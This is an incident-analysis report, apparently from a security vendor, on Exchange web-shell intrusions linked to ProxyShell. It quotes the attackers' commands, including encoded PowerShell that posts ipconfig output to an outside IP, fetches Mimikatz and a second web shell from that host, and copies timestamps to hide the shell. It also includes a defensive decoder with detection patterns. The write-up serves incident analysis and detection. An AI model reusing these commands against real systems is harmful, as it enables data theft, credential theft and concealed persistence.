Analyzing ProxyShell-related Incidents via Trend Micro Managed XDR

Both servers are using Liferay CE version 6.2, which is vulnerable to CVE-2020-7961 (possibly leading to remote code execution).

Incident # 2

Similar to the first incident, the malicious actor accessed the server via a web shell and then started gathering basic information on the system. In the second incident, however, PowerShell was used for different post-exploitation activities.

Our analysis shows that a wget request was sent to a URL with a high-numbered port. Unfortunately, we don't have information as to what was downloaded, since the URL was already dead by the time of analysis.

"C:\Windows\System32\cmd.exe" /c powershell wget http://209.14.0[.]234:56138/iMCRufG79yXvYjH0W1SK

The following commands were executed in order to gather basic system information:

  • cmd.exe /c ipconfig
  • cmd.exe /c dir
  • "c:\windows\system32\cmd.exe" /c ping -n 1 google.com
  • "c:\windows\system32\cmd.exe" /c whoami

The web shell was then copied and the original entry deleted using the following commands:

  • cmd.exe /c ren C:\inetpub\wwwroot\aspnet_client\errorFF.aspx.req errorFF.aspx
  • "c:\windows\system32\cmd.exe" /c del "C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\errorFF.aspx.req"

The output of the ipconfig command was then sent as the body of a wget POST request.

The following code shows the PowerShell-encoded (top) and decoded (bottom) commands:

“c:\windows\system32\cmd.exe” /c powershell.exe -exec bypass -enc JAByAD0AaQBwAGMAbwBuAGYAaQBnACAALwBhAGwAbAAgAHwAIABvAHUAdAAtAHMAdAByAGkAbgBnADsAdwBnAGUAdAAgAC0AVQByAGkAIABoAHQAdABwADoALwAvADkAMQAuADkAMgAuADEAMwA2AC4AMgA1ADAAOgA0ADQAMwA/AFMAZABmAGEAPQBmAGQAcwBzAGQAYQBkAHMAZgBzAGYAYQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBCAG8AZAB5ACAAJAByACAALQBDAG8AbgB0AGUAbgB0AFQAeQBwAGUAIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAG8AYwB0AGUAdAAtAHMAdAByAGUAYQBtACIA

$r=ipconfig /all | out-string;wget -Uri http://91.92.136.250:443?Sdfa=fdssdadsfsfa -Method Post -Body $r -ContentType "application/octet-stream"

Mimikatz, a tool that allows users to view and save credentials and is often used for post-exploitation activities, was downloaded by PowerShell, as shown with the following encoded (top) and decoded (bottom) commands:

“c:\windows\system32\cmd.exe” /c powershell -exec bypass -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcAA6AC8ALwA5ADEALgA5ADIALgAxADMANgAuADIANQAwADoANAA0ADMALwBtAGkAbQBpAC4AZQB4AGUAIgAgAC0ATwB1AHQARgBpAGwAZQAgACIAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHQAZQBtAHAAXABtAGkAbQBpAC4AZQB4AGUAIgA=

Invoke-WebRequest -Uri "http://91.92.136.250:443/mimi.exe" -OutFile "c:\windows\temp\mimi.exe"

The web shell then downloaded an additional .aspx web shell and changed its timestamps to further disguise it in the system, as seen in the following code:

Invoke-WebRequest -Uri "http://91.92.136.250:443/out.aspx" -OutFile "c:\windows\temp\OutlookCM.aspx"

The web shell was then moved to the OWA directory, and its creation, last-write, and last-access times were copied from OutlookCN.aspx in the same directory:

$f1=(Get-Item 'C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\OutlookCM.aspx'); $f2=(Get-Item 'C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\OutlookCN.aspx'); $f1.creationtime=$f2.creationtime; $f1.lastwritetime=$f2.lastwritetime; $f1.lastaccesstime=$f2.lastaccesstime;
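For triage of process telemetry like the command lines above, the following added example (not code from the original article or from Trend Micro) decodes a `-enc` argument, which is Base64 over UTF-16LE text, and tags the behaviours this incident showed. The function names, indicator names, and sample command lines are assumptions made for illustration; the samples are constructed and use addresses from the 192.0.2.0/24 documentation range.

```python
import base64
import re

# Behaviours seen in the decoded commands on this page, expressed as regexes.
INDICATORS = {
    "web_request": re.compile(r"(?i)\b(invoke-webrequest|iwr|wget|curl)\b"),
    "post_body": re.compile(r"(?i)-method\s+post\b.*-body\b"),
    "write_to_temp": re.compile(r"(?i)-outfile\s+\S*\\windows\\temp\\"),
    "timestamp_copy": re.compile(r"(?i)\.(creationtime|lastwritetime|lastaccesstime)\s*="),
}

def decode_encoded_command(cmdline):
    """Return the script behind -enc/-e/-EncodedCommand, or None if absent or invalid."""
    # Normalise typographic quotes that appear when command lines are copied from reports.
    tokens = cmdline.replace("\u201c", '"').replace("\u201d", '"').split()
    for flag, value in zip(tokens, tokens[1:]):
        name = flag[1:].lower()
        # PowerShell accepts any prefix of EncodedCommand, plus the alias -ec.
        if flag[0] in "-/" and name and ("encodedcommand".startswith(name) or name == "ec"):
            try:
                # The argument is Base64 over UTF-16LE text.
                return base64.b64decode(value.strip('"'), validate=True).decode("utf-16-le")
            except ValueError:  # covers malformed Base64 and malformed UTF-16
                return None
    return None

def triage(cmdline):
    """Return (decoded_script_or_None, sorted indicator names) for one command line."""
    decoded = decode_encoded_command(cmdline)
    text = decoded if decoded is not None else cmdline
    return decoded, sorted(n for n, rx in INDICATORS.items() if rx.search(text))

def _encode(script):
    # Helper used only to build the constructed sample input below.
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample command lines (not taken from the incident).
SAMPLE_POST = "$r=ipconfig /all | out-string;wget -Uri http://192.0.2.10:8443/x -Method Post -Body $r"
SAMPLE_GET = 'Invoke-WebRequest -Uri "http://192.0.2.10:8443/a.bin" -OutFile "c:\\windows\\temp\\a.bin"'
SAMPLE_CMDLINES = [
    "cmd.exe /c powershell.exe -exec bypass -enc " + _encode(SAMPLE_POST),
    "cmd.exe /c powershell -e " + _encode(SAMPLE_GET),
    "cmd.exe /c whoami",
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(triage(line))
```
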

After a few minutes, additional DLLs were created, which were later verified to be web shell files created by either w3wp.exe or UMWorkerProcess.exe.

  • c:\windows\microsoft.net\framework64\v4.0.30319\temporary asp.net files\owa\8e05b027\e164d61b\app_web_ffhsdhdi.dll
  • c:\windows\microsoft.net\framework64\v4.0.30319\temporary asp.net files\owa\8e05b027\e164d61b\app_web_m123qbjp.dll

In relation to this incident, we found that the following malicious components and malware were used:

  • OutlookCM.aspx (Trojan.ASP.WEBSHELL.CJ)
  • App_Web_ffhsdhdi.dll (Trojan.Win32.WEBSHELL.EQWO)
  • App_Web_m123qbjp.dll (Trojan.Win32.WEBSHELL.EQWO)

Other web shells

During our investigation into this cluster, we found a specific web shell variant written in C# within an ASP.NET page, which is quite unusual since most web shells that we find are written in PHP instead. This is similar to the bespoke web shell the KRYPTON group utilized in their campaigns. The DLL web shell also had a corresponding ASPX version of it in the same system.